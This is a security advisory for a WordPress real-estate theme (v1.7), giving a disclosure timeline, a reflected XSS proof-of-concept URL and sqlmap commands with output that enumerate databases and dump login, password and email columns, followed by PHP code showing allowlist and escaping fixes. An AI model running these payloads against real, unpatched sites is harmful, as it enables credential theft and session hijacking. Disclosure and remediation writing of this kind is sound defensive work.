Unauthenticated Reflected XSS and SQL Injection vulnerabilities were discovered in the «Nexos - Real Estate WordPress Theme»; the tested version was v1.7.

Timeline:
- June 17th, 2020 - Confirmed and escalated to Envato.
- June 19th, 2020 - v1.8 released, fixing the issues.
### PoC Unauthenticated Reflected XSS:
```
https://example.com/nexos-wp/top-map/?search_order=idlisting DESC&search_location="><img src=x onerror=alert(`XSS`)>
```
### PoC SQL Injection:
```
[!] sqlmap --url="https://example.com/nexos-wp/side-map/?search_order=idlisting%20DESC" --dbs --random-agent --threads 4
[02:23:33] [INFO] the back-end DBMS is MySQL
[02:23:33] [INFO] fetching database names
[02:23:33] [INFO] fetching number of databases
[02:23:33] [INFO] resumed: 2
available databases [2]:
[*] xx_nexos
[*] information_schema

[!] sqlmap --url="https://example.com/nexos-wp/side-map/?search_order=idlisting%20DESC" -D xx_nexos -T wp_users -C user_login,user_pass,user_email --random-agent --threads 8
Database: xx_nexos
Table: wp_users
[9 entries]
[REDACTED]
```
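Both issues come down to how the two query-string parameters named above, `search_order` and `search_location`, are handled. The following is an added example written for this page, not code from the Nexos theme or from Envato: it shows the unsafe handling the advisory implies next to a hardened form. An `ORDER BY` fragment cannot be bound as a prepared-statement parameter, so the fix for `search_order` is an allowlist of column names and directions; the fix for `search_location` is escaping for the HTML attribute context where it is reflected. The function names, the allowed column names and the sample inputs are assumptions; the theme's real table and column names are not on the page.

```php
<?php
// Added example (not the theme's code). Demonstrates the two parameters from
// the advisory handled unsafely and then hardened. Column names are hypothetical.

// search_order: allowlist of ORDER BY columns and directions.
const ALLOWED_ORDER_COLUMNS = ['idlisting', 'price', 'date_added'];   // hypothetical
const ALLOWED_DIRECTIONS    = ['ASC', 'DESC'];

function order_clause_unsafe(string $search_order): string {
    // Vulnerable pattern: raw request value concatenated straight into SQL.
    return "ORDER BY " . $search_order;
}

function order_clause_safe(string $search_order): string {
    $parts  = preg_split('/\s+/', trim($search_order), -1, PREG_SPLIT_NO_EMPTY);
    $column = $parts[0] ?? '';
    $dir    = strtoupper($parts[1] ?? 'ASC');
    if (!in_array($column, ALLOWED_ORDER_COLUMNS, true)
        || !in_array($dir, ALLOWED_DIRECTIONS, true)) {
        // Anything outside the allowlist falls back to a fixed default sort.
        return "ORDER BY `idlisting` DESC";
    }
    return "ORDER BY `$column` $dir";
}

// search_location: reflected into an attribute on the map page, so it must be
// escaped for the HTML attribute context at output time.
function location_input_unsafe(string $search_location): string {
    return '<input type="text" name="search_location" value="' . $search_location . '">';
}

function location_input_safe(string $search_location): string {
    // Inside WordPress, esc_attr() is the idiomatic call; htmlspecialchars keeps
    // this example runnable with plain PHP and no WordPress loaded.
    $escaped = function_exists('esc_attr')
        ? esc_attr($search_location)
        : htmlspecialchars($search_location, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return '<input type="text" name="search_location" value="' . $escaped . '">';
}

// Constructed sample inputs modelled on the advisory's PoC values.
$order    = 'idlisting DESC';                       // legitimate value
$tampered = 'idlisting DESC, 1';                    // constructed: extra clause appended
$location = '"><img src=x onerror=alert(`XSS`)>';  // the advisory's XSS payload

echo order_clause_unsafe($tampered), PHP_EOL;       // extra clause reaches the SQL untouched
echo order_clause_safe($tampered),   PHP_EOL;       // falls back to ORDER BY `idlisting` DESC
echo order_clause_safe($order),      PHP_EOL;       // ORDER BY `idlisting` DESC
echo location_input_unsafe($location), PHP_EOL;     // attribute is closed and a tag injected
echo location_input_safe($location),   PHP_EOL;     // value="&quot;&gt;&lt;img ...&gt;"
```

The allowlist approach is deliberate: escaping cannot make an `ORDER BY` safe, because the injected text is SQL syntax rather than a string literal, so the only sound choice is to map the request value onto a fixed set of known columns and directions and ignore anything else. For the reflected value, escaping must happen where the value is emitted (attribute context here), not on input, so that the stored value stays usable for the search itself.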